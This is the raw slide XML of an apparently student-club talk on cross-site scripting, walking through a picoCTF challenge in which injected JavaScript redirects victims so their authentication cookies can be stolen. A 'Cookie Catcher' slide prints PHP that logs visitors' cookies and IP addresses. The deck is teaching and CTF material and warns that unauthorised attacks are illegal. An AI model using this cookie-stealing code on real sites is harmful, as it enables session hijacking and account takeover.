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72" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="260" r:id="rId13"/>
    <p:sldId id="258" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="261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ps.picoctf.com/index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ss-game.appspot.com/level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Site Scripting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4/7/16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Siddarth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>senthilkumar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="GreyHat at Georgia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536" y="913741"/>
            <a:ext cx="4058474" cy="209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19" y="1345552"/>
            <a:ext cx="3304786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cookie is information saved on a client’s browser by a website.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of usefulness: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Log-In to a website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="JS47622759.jpg (615×40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86" y="128664"/>
            <a:ext cx="3080469" cy="20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38.media.tumblr.com/tumblr_l8cmbjSur51qbjrk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81" y="204584"/>
            <a:ext cx="2284143" cy="22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8488392" y="253048"/>
            <a:ext cx="3149873" cy="2489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600536" y="79738"/>
            <a:ext cx="3037729" cy="25381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image.slidesharecdn.com/php-cookies-sessions-and-auth-110526150223-phpapp02/95/php-cookies-sessions-and-authentication-7-728.jpg?cb=1306426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13" y="2742283"/>
            <a:ext cx="6562615" cy="386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5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doing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>CTF problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from an old competition I did that makes use of XSS vulnerabilities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9609"/>
            <a:ext cx="4599657" cy="46566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What’s a CTF problem??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Capture the Flag” – Essentially a hacking competition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different types of CTFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jeopardy Style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wargames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Red Team/Blue Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TLDR; - Hack shit, find secret text, get points.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More Info: sidsenkumar11.github.io/greyhat.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Come to our Monday meetings from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 346 7-8pm if you like what you see today!!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68" y="1519609"/>
            <a:ext cx="6918385" cy="3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9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82848" cy="4195481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Navigate to this page for the problem website.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sps.picoctf.com/index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Desired page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ID (Take a picture of this or write it down, we’ll need it for later):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>43440b22864b30a0098f034eaf940730ca211a55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9" y="1427131"/>
            <a:ext cx="10134243" cy="21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4944" y="1957388"/>
            <a:ext cx="2843784" cy="1527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http://sps.picoctf.com/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1" y="365760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We make a page that redirects people to another website using injected JavaScript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34257" y="2359724"/>
            <a:ext cx="2148840" cy="722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6472" y="1957388"/>
            <a:ext cx="3614928" cy="1527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website that I own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(like sidsenkumar11.github.io)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7672" y="3566160"/>
            <a:ext cx="6117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When the user goes to my website,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I automatically run a PHP script that records all their</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rowser’s cookies. It then saves this information to my</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Website’s server so that I can look at them at my</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leisure.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8646822">
            <a:off x="4119787" y="4613718"/>
            <a:ext cx="1379913" cy="8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9472" y="195738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Redirecting…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828875">
            <a:off x="2546589" y="3930955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User’s authentication cookie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8501" y="5032590"/>
            <a:ext cx="2843784" cy="1527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http://sps.picoctf.com/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8832" y="6089904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The website now thinks we are someone else!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="http://science-all.com/images/devil/devil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640" y="5355884"/>
            <a:ext cx="1092834" cy="14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-media-cache-ak0.pinimg.com/736x/18/3b/85/183b858b0a4e8de0d7de6d3a3e6262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32" y="408704"/>
            <a:ext cx="1408303" cy="143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3685032" y="1954579"/>
            <a:ext cx="246888" cy="36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Catcher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script that saves all the cookies in your browser when you visit a site containing the script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really simple:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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$cookie = $_GET['c'];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getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ('REMOTE_ADDR');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$date=date("j F, Y, g:i a");;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referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ('HTTP_REFERER');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('cookies.html', 'a');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fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 'Cookie: '.$cookie.'&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; IP: ' .$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. '&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; Date and Time: ' .$date. '&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: '.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.'&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;');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fp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header ("Location: http://www.*******.com");</a:t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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace **** with your own website/server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saves a user’s cookies to a text file when they visit your website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14683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But…I am a poor college student? I don’t want to pay for PHP site hosting?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403" y="3131220"/>
            <a:ext cx="8946541" cy="4195481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Requestb.in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80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I’d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>really</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> appreciate any feedback you guys can give me.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>tinyurl.com/greyhatsurvey1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reactions done looney tunes the end nothing to see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18" y="1488804"/>
            <a:ext cx="47529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News…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34" y="1923522"/>
            <a:ext cx="6444801" cy="419548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GeoHotz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> gets $3M for AI driving startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trump Hotels are hacked again by hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Hacked by hackers? Is that redundant?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Guess I won’t be going to Trump Hotel now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Fun fact: A night at the Trump Tower will run you up at least $375 a night. Ordering a jug of milk to your room for your own in room breakfast will be another $27.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>So maybe I wasn’t going either way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ransomsware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is surging again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was found on at least 3 different energy companies in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>US</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PEBCAK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem Exists Between Chair and Keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://motherboard-images.vice.com/content-images/article/28864/1450282224906697.png?crop=0.9661302681992338xw:1xh;*,*&amp;resize=1200:*&amp;output-format=jpeg&amp;output-quality=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5" y="1759620"/>
            <a:ext cx="4677731" cy="26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fun stuff!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="excited adventure time happy party drunk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22" y="3002038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315" y="1853248"/>
            <a:ext cx="5191192" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting, abbreviated XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Injection Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One of most common website attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript turned on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires user input fields, preferably somewhere you know the database will interact with and then output back on the screen.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i.stack.imgur.com/6aM0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85644"/>
            <a:ext cx="4447641" cy="28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responsible for any of the stupid things you guys will do after learning this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ok seriously – it’s highly illegal to perform random attacks on a website unless you have their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>EXPRESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> permission in writing that you are allowed to do so.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some sites have Bug Bounties where they reward you for finding and responsibly disclosing the bug to them, but make sure of this if you decide to do anything.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765" y="1844371"/>
            <a:ext cx="8946541" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not an attack on the website (like DOS), instead attack on users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow false authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modify pages to behave differently, change links to malware downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send you to another website than the one intended where you could get phished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What is XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?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Non-Persistent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14" y="1652338"/>
            <a:ext cx="10125707" cy="557463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Attack only affects user running the script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful b/c indicates website creator forgot to protect input fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not useful to attack yourself so we also have…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS – a type of non-persistent XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attach malicious script to end of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very common XSS method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious code could:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirect to a phishing page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steal cookie information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Force user to make actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Simple XSS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that persists on a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Having code live on database would be ultimate goal with XSS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JavaScript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3739"/>
            <a:ext cx="9659960" cy="47008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 is a markup language that tells a browser how to display information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ex. &lt;b&gt;Hello World!&lt;/b&gt; tells browser to display bold text “Hello World”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every &lt;…&gt; is called a tag and specifies how the browser should interpret what is between the tag and the closing tag (&lt;/…&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript is a programming language that runs in your browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It can be written directly in the HTML source using the script tags (&lt;script&gt;…..&lt;/script&gt;) or linked to in a separate file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you don’t know JavaScript, it’s OK. There are TONS of resources for JavaScript development online; Googling any question you may have will probably result in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>StackOverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>post where someone has literally coded exactly what you need.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worst case, just pretend it’s Java and write what you want it to do – the two languages are very similar in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841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Cross Site Scripting </vt:lpstr>
      <vt:lpstr>In Other News…</vt:lpstr>
      <vt:lpstr>On to the fun stuff!</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>What is XSS? (Continued)</vt:lpstr>
      <vt:lpstr>Non-Persistent script </vt:lpstr>
      <vt:lpstr>Persistent XSS</vt:lpstr>
      <vt:lpstr>HTML and JavaScript review</vt:lpstr>
      <vt:lpstr>Cookies Review</vt:lpstr>
      <vt:lpstr>Live Demo!</vt:lpstr>
      <vt:lpstr>Shameless Plug</vt:lpstr>
      <vt:lpstr>Live Demo!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookie Catcher</vt:lpstr>
      <vt:lpstr>But…I am a poor college student? I don’t want to pay for PHP site hosting?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Siddarth Senthilkumar</dc:creator>
  <cp:lastModifiedBy>Siddarth Senthilkumar</cp:lastModifiedBy>
  <cp:revision>65</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-06T00:31:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-07T03:06:20Z</dcterms:modified>
</cp:coreProperties>
</file>